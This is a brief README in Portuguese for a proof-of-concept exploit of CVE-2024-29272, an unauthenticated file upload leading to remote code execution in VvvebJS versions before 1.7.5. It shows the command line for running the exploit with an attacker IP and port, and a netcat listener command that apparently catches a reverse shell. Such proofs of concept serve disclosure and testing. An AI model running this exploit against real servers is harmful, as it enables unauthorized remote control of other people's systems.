
Este é um Proof-of-Concept para CVE-2024-29272, uma vulnerabilidade de upload arbitrário de arquivos não autenticado que leva à execução remota de código nas versões do VvvebJS < 1.7.5.
uso:
python3 poc.py -u <URL> -l <IP DO ATACANTE> -p <PORTA DO ATACANTE>
em outro terminal:
nc -lvnp <PORTA DO ATACANTE>